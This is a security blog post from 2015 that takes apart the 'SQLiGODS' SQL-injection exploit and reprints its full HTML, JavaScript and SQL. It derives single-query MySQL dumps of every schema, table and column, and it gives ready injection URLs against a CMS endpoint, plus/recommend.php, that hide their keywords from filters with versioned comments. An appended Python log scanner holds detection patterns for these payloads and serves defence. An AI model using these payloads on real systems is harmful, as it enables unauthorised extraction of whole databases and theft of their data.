A few tips gleaned from SQLiGODS

Published: April 26, 2015 // Categories: code study, mysql

Reference: http://zone.wooyun.org/content/16039

That post presents an exp (exploit payload) that can dump all of the data in one go. I had always found it very powerful and admired it; after working with it for a while I decided to study the actual process in depth, hence this post.


Along the way I decoded the exp and found something interesting.



<script> name=prompt("Please Enter Your Name : "); url=prompt("Please Enter The Url you're trying to Inject and write 'makman' at your Injection Point, Example : http://site.com/file.php?id=-4 UNION SELECT 1,2,3,concat(6d616b,makman),5—+- NOTE : Just replace your Injection point with keyword 'makman'"); </script> ,  // the familiar opening
<b> <font color=red>SQLiGODs Syntax V 1.0 By MakMan</font><br><br> <font color=green size=4>Injected by <script>document.write(name);</script></font><br>
<table border="1">
<tr><td>DB Version : </td> <td><font color=blue> ,version(), </font></td></tr>  // version()
<tr><td> DB User : </td> <td><font color=blue> ,user(), </font></td></tr>  // user()
<tr><td>Primary DB : </td> <td><font color=blue> ,database(), </td></tr></table> <br>,  // database()
<font color=blue>Choose a table from the dropdown menu : </font> <br>,concat(
<script>
function toHex(str){  // convert to hex
  var hex =''; for(var i=0;i<str.length;i++){ hex += ''+str.charCodeAt(i).toString(16); } return hex; }
function redirect(site){ maksplit=site.split("."); dbname=maksplit[0]; tblname=maksplit[1];
  makrep="concat( IF(@tbl:="+toHex(tblname)+",0,0), IF(@db:="+toHex(dbname)+",0,0), concat( <script> url=""+toHex(url)+""; </script>),  // encode the url
  concat(concat( <script>db=",@db,";tbl=",@tbl,";</script>,<b> <font color=red> SQLiGODs Syntax V 1.0 By MakMan</font><br><br> Table Name : <font color=blue>,@tbl,</font> from database : <font color=blue>,@db,</font> <br>Number Of Columns : <font color=blue> <script> colcnt=",(SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl),";  // SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl : counts the columns of one table
  document.write(colcnt);</script> </font>,<br>, (select (@x) from (select (@x:=00),(@chk:=1), (select (0) from (information_schema.columns) where (table_schema="+toHex(dbname)+") and (table_name="+toHex(tblname)+") and (00) in (@x:=concat_ws(20,@x,IF(@chk=1, <script> colname = new Array(); var i = 1;,20), colname[i] = ",column_name,"; i++;,IF(@chk:=2,20,20)))))x),for(i=1;i<=colcnt;i++){ document.write("<font color=green>"+i+". </font>"+colname[i]+"<br>");}</script> ,
  concat(<b>,<script>query="";for(i=1;i<colcnt;i++){ // query=query+colname[i]+", :: ,"; } url=url.replace("'","%27"); dmpquery=url.replace("makman","(select(@) from(select(@:=00) ,(select (@) from("+db+"."+tbl+")where(@) in (@:=concat_ws(20,@,"+query+"<br>))))a)");  // replace makman with the SQL statement: this is the query that matters for us
  document.write("<a href='"+dmpquery+"'>Click Here to Dump this whole Table<a>");</script>))))";
  url=url.replace("'","%27"); urlpas1=url.replace("makman",makrep); window.open(urlpas1); }
</script>
<select onchange="redirect(this.value)"> <option value="mknone" selected>Choose a Table</option>, (select (@x) from (select (@x:=00), (select (0) from (information_schema.tables) where (table_schema!=information_schema) and (00) in (@x:=concat(@x, <option value=",UNHEX(HEX(table_schema)),.,UNHEX(HEX(table_name)),">,UNHEX(HEX(concat(Database :: ,table_schema, :: Table :: ,table_name))),</option>))))x),</select>), <br><br><br><br><br>

Taking it apart, the key piece turns out to be:

select(@) from(select(@:=00) ,(select (@) from("+db+"."+tbl+")where(@) in (@:=concat_ws(20,@,"+query+"

Testing it locally myself, this is what I ended up with:

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema)))))x

This lists all databases.

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name)))))x

This lists all tables.

Listing all databases, tables and columns at once then looks like this:

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name))) ) )x

Far too much data: it simply timed out.

PS: the risk here is of course considerable; my CPU, for instance, was eaten up completely.

Applied to an actual injection point, it looks like this. For instance, this is how we normally inject:

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

Using the method above, we pull out all the tables and their columns:

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

And of course all tables and columns can be listed in a single shot:

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name,column_name)))))x),5,6,7,8,9%2
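Requests like the ones above leave a recognisable signature in web-server access logs: versioned comments (/*!50000...*/), a UNION SELECT, a reference to information_schema, and the @var := CONCAT(@var, ...) accumulation that pulls everything back in one row. The following is an added example from the defender's side (not code from the original post or from SQLiGODS): it normalises a request path the way MySQL would see it, scores those indicators, and flags requests that combine them. The log lines, hosts and thresholds are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post); the second carries the
# user-variable accumulation payload the post describes, the third a lone UNION probe.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Apr/2015:10:00:01 +0800] "GET /plus/recommend.php?aid=1 HTTP/1.1" 200 512
10.0.0.9 - - [26/Apr/2015:10:00:02 +0800] "GET /plus/recommend.php?aid=1&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5%23 HTTP/1.1" 200 9731
10.0.0.7 - - [26/Apr/2015:10:00:03 +0800] "GET /search.php?q=union+all+select HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
# MySQL executes the text inside /*!50000 ... */, so unwrap it rather than discard it.
VERSIONED_RE = re.compile(r"/\*!\d{5}\s*(.*?)\s*\*/", re.S)
INDICATORS = {  # checked on the decoded, unwrapped, lower-cased path
    "union_select": re.compile(r"\bunion\b.*?\bselect\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    # @var := CONCAT(@var, ...) is the one-row accumulation trick from the post
    "uservar_accumulate": re.compile(r"@\w*\s*:=\s*concat(?:_ws)?\s*\("),
}

def normalise(raw_path):
    """Decode (bounded, to cope with double encoding) and unwrap versioned comments."""
    text = raw_path
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return VERSIONED_RE.sub(r"\1", text).lower()

def scan_request(raw_path):
    """Return the names of the indicators present in one request path."""
    hits = []
    if VERSIONED_RE.search(unquote_plus(raw_path)):
        hits.append("versioned_comment")
    text = normalise(raw_path)
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits

def scan_log(log_text, min_hits=2):
    """Return (path, hits) for each request that shows at least min_hits indicators."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            hits = scan_request(m.group(1))
            if len(hits) >= min_hits:
                findings.append((m.group(1), hits))
    return findings
```

A single UNION probe on its own stays below the threshold; the combination of versioned comments, information_schema and the user-variable accumulation is what marks the whole-database dump.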
